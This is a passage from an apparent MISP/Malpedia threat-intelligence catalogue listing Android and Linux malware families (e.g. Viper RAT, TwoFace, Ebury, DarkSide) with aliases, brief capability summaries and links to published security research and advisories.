https://unit42.paloaltonetworks.com/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/

Viper RAT

The tag is: misp-galaxy:malpedia="Viper RAT"

Viper RAT is also known as:

Table 941. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat
https://about.fb.com/wp-content/uploads/2021/04/Technical-threat-report-Arid-Viper-April-2021.pdf
https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/
https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/

WireX

The tag is: misp-galaxy:malpedia="WireX"

WireX is also known as:

Table 942. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex
https://www.justice.gov/usao-ndil/pr/federal-indictment-chicago-charges-turkish-national-directing-cyber-attack
https://therecord.media/turkish-national-charged-for-ddos-attacks-with-the-wirex-botnet/
https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/
https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/

WolfRAT

The tag is: misp-galaxy:malpedia="WolfRAT"

WolfRAT is also known as:

Table 943. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.wolf_rat
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html

Wroba

According to Avira, this is a banking trojan targeting Japan.

The tag is: misp-galaxy:malpedia="Wroba"

Wroba is also known as:

Table 944. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.wroba
https://www.avira.com/en/blog/the-android-banking-trojan-wroba-shifts-attack-from-south-korea-to-target-users-in-japan

Xbot

The tag is: misp-galaxy:malpedia="Xbot"

Xbot is also known as:

Table 945. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot
https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/
https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/

XploitSPY

The tag is: misp-galaxy:malpedia="XploitSPY"

XploitSPY is also known as:

Table 946. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.xploitspy
https://twitter.com/malwrhunterteam/status/1249768400806653952

XRat

The tag is: misp-galaxy:malpedia="XRat"

XRat is also known as:

Table 947. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat
https://blog.lookout.com/xrat-mobile-threat

YellYouth

The tag is: misp-galaxy:malpedia="YellYouth"

YellYouth is also known as:

Table 948. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.yellyouth
https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html

Zen

The tag is: misp-galaxy:malpedia="Zen"

Zen is also known as:

Table 949. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.zen
https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html

ZooPark

The tag is: misp-galaxy:malpedia="ZooPark"

ZooPark is also known as:

Table 950. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark
https://securelist.com/whos-who-in-the-zoo/85394/
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf
https://www.secureworks.com/research/threat-profiles/cobalt-juno
https://securelist.com/whos-who-in-the-zoo/85394
https://securelist.com/apt-trends-report-q2-2019/91897/

Ztorg

The tag is: misp-galaxy:malpedia="Ztorg"

Ztorg is also known as:

Qysly

Table 951. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg
http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2
https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1
https://securelist.com/ztorg-from-rooting-to-sms/78775/

TwoFace

According to Unit42, TwoFace is a two-staged (loader+payload) webshell, written in C# and meant to run on webservers with ASP.NET. The author of the initial loader webshell included legitimate and expected content that will be displayed if a visitor accesses the shell in a browser, likely to remain undetected. The code in the loader webshell includes obfuscated variable names and the embedded payload is encoded and encrypted. To interact with the loader webshell, the threat actor uses HTTP POST requests to the compromised server.

The secondary webshell, which we call the payload, is embedded within the loader in encrypted form and contains additional functionality that we will discuss in further detail. When the threat actor wants to interact with the remote server, they provide data that the loader will use to modify a decryption key embedded within the loader that will be in turn used to decrypt the embedded TwoFace payload. Commands supported by the payload are execution of programs, up-, download and deletion of files and capability to manipulate MAC timestamps.

The tag is: misp-galaxy:malpedia="TwoFace"

TwoFace is also known as:

HighShell
HyperShell
Minion
SEASHARPEE

Table 952. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/asp.twoface
https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view
https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/
https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf
https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/
https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/
https://www.youtube.com/watch?v=GjquFKa4afU
https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI
https://www.secureworks.com/research/threat-profiles/cobalt-gypsy
https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf
https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/
https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf

Unidentified ASP 001 (Webshell)

The tag is: misp-galaxy:malpedia="Unidentified ASP 001 (Webshell)"

Unidentified ASP 001 (Webshell) is also known as:

Table 953. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/asp.unidentified_001

ACBackdoor (ELF)

A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.

The tag is: misp-galaxy:malpedia="ACBackdoor (ELF)"

ACBackdoor (ELF) is also known as:

Table 954. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor
https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/

AgeLocker

The tag is: misp-galaxy:malpedia="AgeLocker"

AgeLocker is also known as:

Table 955. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker
https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/
https://twitter.com/IntezerLabs/status/1326880812344676352
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

AirDropBot

AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing.

The tag is: misp-galaxy:malpedia="AirDropBot"

AirDropBot is also known as:

CloudBot

Table 956. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.airdrop
https://blog.malwaremustdie.org/2019/09/mmd-0064-2019-linuxairdropbot.html

Aisuru

Honeypot-aware variant of Mirai.

The tag is: misp-galaxy:malpedia="Aisuru"

Aisuru is also known as:

Table 957. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.aisuru
https://insights.oem.avira.com/new-mirai-variant-aisuru-detects-cowrie-opensource-honeypots/

Anchor_DNS

The tag is: misp-galaxy:malpedia="Anchor_DNS"

Anchor_DNS is also known as:

Table 958. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns
https://www.netscout.com/blog/asert/dropping-anchor
https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf
https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns
https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate

ANGRYREBEL

The tag is: misp-galaxy:malpedia="ANGRYREBEL"

ANGRYREBEL is also known as:

Ghost RAT

Table 959. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel
https://www.secureworks.com/research/threat-profiles/bronze-olive
https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf

azazel

Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features

The tag is: misp-galaxy:malpedia="azazel"

azazel is also known as:

Table 960. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.azazel
https://github.com/chokepoint/azazel

Babuk (ELF)

ESX and NAS modules for Babuk ransomware.

The tag is: misp-galaxy:malpedia="Babuk (ELF)"

Babuk (ELF) is also known as:

Table 961. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk
https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/
https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/
https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings
https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/
https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2
https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

Irc16

The tag is: misp-galaxy:malpedia="Irc16"

Irc16 is also known as:

Table 962. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16
https://news.drweb.com/show/?c=5&i=10193&lng=en

Bashlite

The tag is: misp-galaxy:malpedia="Bashlite"

Bashlite is also known as:

Gafgyt
gayfgt
lizkebab
qbot
torlus

Table 963. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/
https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/
https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/
https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218
https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/
https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt
https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group
http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/
https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

BCMPUPnP_Hunter

The tag is: misp-galaxy:malpedia="BCMPUPnP_Hunter"

BCMPUPnP_Hunter is also known as:

Table 964. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter
https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/

Bifrost

Linux version of the bifrose malware that originally targeted Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.

The tag is: misp-galaxy:malpedia="Bifrost"

Bifrost is also known as:

elf.bifrose

Table 965. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost
https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/

BigViktor

A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.

The tag is: misp-galaxy:malpedia="BigViktor"

BigViktor is also known as:

Table 966. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.bigviktor
https://blog.netlab.360.com/bigviktor-dga-botnet/

BioSet

The tag is: misp-galaxy:malpedia="BioSet"

BioSet is also known as:

Table 967. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.bioset
https://twitter.com/IntezerLabs/status/1409844721992749059

BlackMatter (ELF)

The tag is: misp-galaxy:malpedia="BlackMatter (ELF)"

BlackMatter (ELF) is also known as:

Table 968. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751
https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/
https://blog.group-ib.com/blackmatter#
https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/
https://twitter.com/VK_Intel/status/1423188690126266370
https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service
https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/
https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2
https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

Blackrota

The tag is: misp-galaxy:malpedia="Blackrota"

Blackrota is also known as:

Table 969. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota
https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/
https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

Break out the Box

This is a pentesting tool and according to the author, "BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.".

It has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.

The tag is: misp-galaxy:malpedia="Break out the Box"

Break out the Box is also known as:

BOtB

Table 970. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.botb
https://github.com/brompwnie/botb

Capoae

XMRig-based mining malware written in Go.

The tag is: misp-galaxy:malpedia="Capoae"

Capoae is also known as:

Table 971. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.capoae
https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread

CDorked

This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech

The tag is: misp-galaxy:malpedia="CDorked"

CDorked is also known as:

CDorked.A

Table 972. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked
https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/
https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html
https://www.symantec.com/security-center/writeup/2013-050214-5501-99
https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/
https://blogs.cisco.com/security/linuxcdorked-faqs

CDRThief

The tag is: misp-galaxy:malpedia="CDRThief"

CDRThief is also known as:

Table 973. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdrthief
https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/

Cephei

The tag is: misp-galaxy:malpedia="Cephei"

Cephei is also known as:

Table 974. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.cephei
https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader

Cetus

The tag is: misp-galaxy:malpedia="Cetus"

Cetus is also known as:

Table 975. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.cetus
https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/

Chapro

The tag is: misp-galaxy:malpedia="Chapro"

Chapro is also known as:

Table 976. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro
http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html
http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a

Cloud Snooper

The tag is: misp-galaxy:malpedia="Cloud Snooper"

Cloud Snooper is also known as:

Snoopy

Table 977. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper
https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf

Corona DDOS Bot

The tag is: misp-galaxy:malpedia="Corona DDOS Bot"

Corona DDOS Bot is also known as:

Table 978. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.corona
https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/

Cpuminer (ELF)

This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.

The tag is: misp-galaxy:malpedia="Cpuminer (ELF)"

Cpuminer (ELF) is also known as:

Table 979. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer
https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/
https://github.com/pooler/cpuminer

Cr1ptT0r

The tag is: misp-galaxy:malpedia="Cr1ptT0r"

Cr1ptT0r is also known as:

CriptTor

Table 980. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r
https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html
https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/
https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html

Dacls (ELF)

The tag is: misp-galaxy:malpedia="Dacls (ELF)"

Dacls (ELF) is also known as:

Table 981. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/
https://blog.netlab.360.com/dacls-the-dual-platform-rat/
https://www.sygnia.co/mata-framework
https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
https://securelist.com/apt-trends-report-q2-2020/97937/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

Dark

Mirai variant exploiting CVE-2021-20090 and CVE2021-35395 for spreading.

The tag is: misp-galaxy:malpedia="Dark"

Dark is also known as:

Dark.IoT

Table 982. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark
https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities
https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx
https://twitter.com/ESETresearch/status/1440052837820428298?s=20
https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx

Dark Nexus

The tag is: misp-galaxy:malpedia="Dark Nexus"

Dark Nexus is also known as:

Table 983. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus
https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly

DarkSide (ELF)

The tag is: misp-galaxy:malpedia="DarkSide (ELF)"

DarkSide (ELF) is also known as:

Table 984. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside
https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/
https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin
https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/
https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9
https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/
https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access
https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/
https://blog.group-ib.com/blackmatter#
https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/
https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/
https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime
https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/
https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/
https://www.youtube.com/watch?v=qxPXxWMI2i4
https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636
https://twitter.com/JAMESWT_MHT/status/1388301138437578757
https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/
https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/
https://therecord.media/popular-hacking-forum-bans-ransomware-ads/
https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/
https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html
https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service
https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://pylos.co/2021/05/13/mind-the-air-gap/
https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212
https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/
https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b
https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/
https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version
https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside
https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html
https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/
https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout
https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted

DarkRadiation

The tag is: misp-galaxy:malpedia="DarkRadiation"

DarkRadiation is also known as:

Table 985. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark_radiation
https://www.sentinelone.com/blog/darkradiation-abusing-bash-for-linux-and-docker-container-ransomware/

DDG

First activity observed in October 2017. DDG is a botnet with P2P capability that is targeting crypto currency mining (Monero).

The tag is: misp-galaxy:malpedia="DDG"

DDG is also known as:

Table 986. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg
https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/
https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/
https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/
https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/
https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/

ddoor

The tag is: misp-galaxy:malpedia="ddoor"

ddoor is also known as:

Table 987. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddoor
https://github.com/rek7/ddoor

Derusbi (ELF)

The tag is: misp-galaxy:malpedia="Derusbi (ELF)"

Derusbi (ELF) is also known as:

Table 988. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.derusbi
https://twitter.com/IntezerLabs/status/1407676522534735873?s=20

Doki

The tag is: misp-galaxy:malpedia="Doki"

Doki is also known as:

Table 989. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki
https://www.securecoding.com/blog/all-about-doki-malware/
https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/
https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/

DoubleFantasy (ELF)

The tag is: misp-galaxy:malpedia="DoubleFantasy (ELF)"

DoubleFantasy (ELF) is also known as:

Table 990. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.doublefantasy
https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/
https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf

Ebury

This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.

This family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.

The tag is: misp-galaxy:malpedia="Ebury"

Ebury is also known as:

Table 991. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury
https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf
https://security.web.cern.ch/security/advisories/windigo/windigo.shtml
https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download
https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/
https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/
https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy
https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf
https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Echobot

The latest in this long line of Mirai scourges is a new variant named Echobot. Coming to life in mid-May, the malware was first described by Palo Alto Networks in a report published at the start of June, and then again in a report by security researchers from Akamai, in mid-June.

When it was first spotted by Palo Alto Networks researchers in early June, Echobot was using exploits for 18 vulnerabilities. In the Akamai report, a week later, Echobot was at 26.

https://www.zdnet.com/article/new-echobot-malware-is-a-smorgasbord-of-vulnerabilities

The tag is: misp-galaxy:malpedia="Echobot"

Echobot is also known as:

Table 992. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot
https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits—targeting-scada
https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/
https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html
https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/

Erebus (ELF)

The tag is: misp-galaxy:malpedia="Erebus (ELF)"

Erebus (ELF) is also known as:

Table 993. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus
https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/

EvilGnome

The tag is: misp-galaxy:malpedia="EvilGnome"

EvilGnome is also known as:

Table 994. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome
https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought
https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/

Exaramel (ELF)

The tag is: misp-galaxy:malpedia="Exaramel (ELF)"

Exaramel (ELF) is also known as:

Table 995. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel
https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm
https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/
https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf
https://twitter.com/craiu/status/1361581668092493824
https://www.wired.com/story/sandworm-centreon-russia-hack/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf
https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf

ext4

The tag is: misp-galaxy:malpedia="ext4"

ext4 is also known as:

Table 996. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4
https://www.recordedfuture.com/chinese-cyberespionage-operations/

Facefish

